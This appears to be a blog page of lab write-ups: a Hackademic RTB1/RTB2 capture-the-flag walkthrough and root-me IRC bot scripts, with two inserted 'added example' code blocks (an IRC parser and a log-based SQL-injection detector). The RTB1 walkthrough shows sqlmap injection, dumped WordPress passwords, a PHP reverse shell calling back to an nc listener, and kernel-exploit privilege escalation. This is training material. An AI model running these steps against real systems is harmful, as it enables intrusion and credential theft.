Sunday 31 January 2016

Hackademic 2

Hackademic Level 2.

The methodology will be very similar to the Hackademic 1 walkthrough.
root@osboxes:~# nmap -sn 192.168.1.0/24
We get the following result:
Nmap scan report for 192.168.1.103
Host is up (0.0011s latency).
MAC Address: 00:0C:29:74:B5:21 (VMware)
We know that our target has the IP address 192.168.1.103.

Let's enumerate the services of our target:
root@osboxes:~# nmap -sV 192.168.1.103

Starting Nmap 6.47 ( http://nmap.org ) at 2016-01-31 21:34 GMT
Nmap scan report for 192.168.1.103
Host is up (0.00088s latency).
Not shown: 998 closed ports
PORT    STATE    SERVICE VERSION
80/tcp  open     http    Apache httpd 2.2.14 ((Ubuntu))
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)
We are able to browse the web application.


We noticed a very interesting web form with username and password fields.
Let's examine the form for SQL injection:
root@osboxes:~# sqlmap -u "http://192.168.1.103/" --forms --level 5 --risk 3
But unfortunately, neither parameter is vulnerable.
When we try to guess credentials, the web application redirects us to the /check.php page.
The source of check.php is also not interesting; maybe dirbuster will uncover something.

phpMyAdmin doesn't accept default credentials, and I didn't perform a brute-force attack.
Let's look at our nmap scan result again...
We see that tcp/666 is filtered. Maybe we should look for some UDP ports?
TBU

Ecoded_string

The second programming challenge from root-me. For me, this one also requires basic programming skills.


Statement
To start this challenge, you must send a private message to the bot Candy: !ep2

- The bot answers you by private message.
- It is a series of encoded characters.
- You must send it the decoded message.
- You have 2 seconds.
- If the bot does not respond, then you have been banned. Just wait a few minutes.
- The answer must be sent as:
!ep2 -rep <answer>

Exploit
import socket
import base64

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('irc.root-me.org', 6667))
    # register with the IRC server (every IRC line ends with CRLF)
    s.send('NICK rootek\r\n')
    print s.recv(1024000)
    s.send('USER rootek 0 * :Real Name\r\n')
    print s.recv(1024000)
    s.send('JOIN #root-me_challenge\r\n')
    print s.recv(20140000)
    # ask the bot for the challenge; its reply is a PRIVMSG and the
    # encoded string is the trailing part after ' :'
    s.send('PRIVMSG Candy !ep2\r\n')
    answer = s.recv(128).split(' :')[1].replace(' ', '').strip()
    print answer
    # decode and send the answer back within the 2-second limit
    s.send('PRIVMSG Candy !ep2 -rep ' + base64.b64decode(answer) + '\r\n')
    print s.recv(10240)
    s.send('QUIT\r\n')
    print "Connection closed"

except Exception, e:
    print e

Go_back_to_the_college

Hi,
Maybe someone has heard about the root-me challenges. I have written an exploit for the first programming challenge and would like to present it. For me, this challenge requires basic programming skills.

Statement

To start the challenge using IRC, you must send a private message to the bot Candy: !ep1. The bot replies with a private message containing a string like this:
<number1>/<number2>
- You must calculate the square root of number 1 and multiply the result by number 2.
- Then you need to round to two decimals.
- You have 2 seconds to send the correct answer from the time the bot gets the message !ep1.
- If the bot does not respond, then you have been banned. Just wait a few minutes.
- The answer must be sent as:
!ep1 -rep <answer>
Exploit
import socket
import math

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('irc.root-me.org', 6667))
    # register with the IRC server (every IRC line ends with CRLF)
    s.send('NICK foo\r\n')
    print s.recv(1024000)
    s.send('USER foo 0 * :Real Name\r\n')
    print s.recv(1024000)
    s.send('JOIN #root-me_challenge\r\n')
    print s.recv(20140000)
    # ask the bot for the challenge; its reply is a PRIVMSG whose
    # trailing part (after ' :') is "<number1>/<number2>"
    s.send('PRIVMSG Candy !ep1\r\n')
    answer = s.recv(128).split(' :')[1].replace(' ', '').strip()
    first = math.sqrt(float(answer.split('/')[0]))
    second = answer.split('/')[1]
    # sqrt(number1) * number2, rounded to two decimals
    res = "{li:.2f}".format(li=first * int(second))
    print res
    s.send('PRIVMSG Candy !ep1 -rep ' + res + '\r\n')
    print s.recv(1024000)
    s.send('QUIT\r\n')
    print "Connection closed"

except Exception, e:
    print e
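
Both exploits above read the bot's reply with a single recv(128) and split on ' :', which breaks when the server's PING or a JOIN echo arrives first, or when the reply straddles two reads. The following is an added example, not code from the original posts: it buffers received bytes into complete IRC lines, parses PRIVMSG lines, answers PING, and solves both the ep1 (sqrt(number1) * number2, two decimals) and ep2 (base64) payloads; socket I/O is left to the caller, and the sample lines used for checking it are constructed.

```python
import base64
import math

def split_lines(carry, chunk):
    """Join a recv() chunk onto the bytes carried over from the previous
    call and return (complete lines as str, leftover partial bytes).
    recv() returns arbitrary-sized chunks, so a bot reply may straddle two
    reads; the partial tail is kept for the next call."""
    *lines, rest = (carry + chunk).split(b"\r\n")
    return [l.decode("utf-8", "replace") for l in lines], rest

def parse_privmsg(line):
    """Return (sender nick, target, trailing text) for a PRIVMSG line,
    or None for any other line (PING, numerics, JOIN echoes, ...)."""
    if not line.startswith(":"):
        return None
    prefix, _, rest = line[1:].partition(" ")
    command, _, params = rest.partition(" ")
    if command != "PRIVMSG":
        return None
    target, _, trailing = params.partition(" :")
    return prefix.split("!", 1)[0], target, trailing

def solve_ep1(payload):
    """ep1: sqrt(number1) * number2, rounded to two decimals."""
    n1, n2 = payload.strip().split("/")
    return "{:.2f}".format(math.sqrt(float(n1)) * float(n2))

def solve_ep2(payload):
    """ep2: the payload is base64; return the decoded text."""
    return base64.b64decode(payload.strip().replace(" ", "")).decode()

def reply_for(line, challenge):
    """Build the line to send back for one received line, or None.
    PING must be answered or the server drops the connection; a PRIVMSG
    from Candy gets the solved answer. The answer goes in the ':'-prefixed
    trailing parameter so that spaces in it survive (RFC 1459)."""
    if line.startswith("PING "):
        return "PONG " + line[5:] + "\r\n"
    parsed = parse_privmsg(line)
    if parsed is None or parsed[0] != "Candy":
        return None
    solver = {"ep1": solve_ep1, "ep2": solve_ep2}[challenge]
    return "PRIVMSG Candy :!%s -rep %s\r\n" % (challenge, solver(parsed[2]))
```

A caller loops over recv() chunks, feeds each through split_lines, and sends whatever reply_for returns for every complete line.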

Hackademic 1


Probably many of you have heard about the OSCP (Offensive Security Certified Professional) certification.
If so, and you are wondering about trying this hard certification, this solution of Hackademic 1 may be helpful for you.

I run Kali Linux and our target in VMware Workstation.

At the beginning we have to perform scanning and find our target's IP. Our target has the IP address 192.168.1.103. Let's play ball!

and enumerate the services of our target:

Great! We are able to browse the web application. We see the following webpage:

Nothing interesting... Hmm, maybe there will be something in the source?

We verified that the web application uses WordPress version 1.5.1.1 (so old) - that is juicy information!
Now we know that the admin panel will be at one of the following default locations: wp-admin.php, wp-login.php, login.php or admin.php.
But despite this finding, we don't have credentials.

Dirbuster guessed several files and directories:

While walking through the application I paid attention to the following URL:
http://192.168.1.103/Hackademic_RTB1/?cat=1
Maybe the cat parameter is vulnerable to SQL injection, for example?

I run sqlmap:
sqlmap -u "http://192.168.1.103/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -p cat
BINGO! The cat parameter is vulnerable!
We retrieve the names of the databases:
sqlmap -u "http://192.168.1.103/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -p cat --dbs
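
From the defender's side, the sqlmap run against the cat parameter leaves a clear trail in the Apache access log. This added example (not part of the original post) parses combined-format log lines and flags requests whose cat value, which WordPress expects to be an integer category id, contains SQL syntax, or whose User-Agent names sqlmap; the log lines and the User-Agent string in SAMPLE_LOG are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# SQL syntax that never belongs in an integer category id
SQLI_MARKERS = re.compile(
    r"(\bunion\b.*\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|\band\b\s+\d+=\d+|'|--|#|/\*)",
    re.IGNORECASE)

# constructed sample: one normal request, then two injection probes
SAMPLE_LOG = """\
192.168.1.10 - - [31/Jan/2016:21:40:01 +0000] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.1.10 - - [31/Jan/2016:21:41:15 +0000] "GET /Hackademic_RTB1/?cat=1%27%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.10 - - [31/Jan/2016:21:41:16 +0000] "GET /Hackademic_RTB1/?cat=-1%20UNION%20ALL%20SELECT%20NULL,NULL-- HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

def inspect_request(line, param="cat"):
    """Return the reasons one log line looks like SQLi against `param`
    (empty list = nothing suspicious, None = line did not parse)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    if "sqlmap" in m.group("ua").lower():
        reasons.append("sqlmap user-agent")
    # parse_qs percent-decodes the values, so %27 becomes a quote here
    query = parse_qs(urlsplit(m.group("path")).query, keep_blank_values=True)
    for value in query.get(param, []):
        # WordPress's cat is an integer category id; anything else is abnormal
        if not value.lstrip("-").isdigit():
            reasons.append("non-numeric %s=%r" % (param, value))
        if SQLI_MARKERS.search(value):
            reasons.append("SQL syntax in %s" % param)
    return reasons

def scan_log(text, param="cat"):
    """Return (ip, path, reasons) for every suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        reasons = inspect_request(line, param)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), m.group("path"), reasons))
    return hits
```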

The wordpress database looks interesting...
sqlmap -u "http://192.168.1.103/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -p cat -D wordpress --tables

The wp_users table may contain WordPress credentials...
sqlmap -u "http://192.168.1.103/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -p cat -D wordpress -T wp_users --dump
We have got credentials:
NickJames | admin
JohnSmith | PUPPIES
GeorgeMiller | q1w2e3
TonyBlack | napoleon
JasonKonnors | maxwell
MaxBucky | kernel
So we have to find out who is an administrator, because a WordPress administrator is able to upload files (in particular PHP code).

We visit
http://192.168.1.103/Hackademic_RTB1/wp-login.php
and now we are sure that the GeorgeMiller account is the most important, because it has access to the file upload feature.

We are able to copy the content of a webshell from Kali and paste it into wp-content/plugins/hello.php:
/usr/share/webshells/php/php-reverse-shell.php
I set
$ip = my IP;
$port = 4444;

and I start netcat:
nc -nlvp 4444
We also have to open the URL so that the shell connects back:

Excellent!! We have got a limited shell!
First of all, we execute the following command:
python -c "import pty;pty.spawn('/bin/bash')"
This command gives us a proper TTY.
We don't have access to the content of the /home directory, but we are able to find credentials to MySQL. Unfortunately the raptor_udf2 exploit doesn't work.
cat /etc/shadow doesn't work either, because the apache user doesn't have the privilege to open /etc/shadow.
Maybe our target OS is out of date? Let's check!
bash-4.0$ uname -a
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
OK! Let's find some exploit for Linux 2.6.x to escalate our privileges.
Searching...
I find "Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation".
We have to download the exploit, upload it to the vulnerable server and execute it, of course.

Amazing! We are root, let's execute:

sh-4.0# cat /root/key.txt
cat /root/key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)

$_d&jgQ>>ak\#b"(Hx"o<la_%

Regards,
mr.pr0n || p0wnbox.Team || 2011
Game over

Hello everyone!

If you are looking for juicy information about hacking and information security, this blog is for you!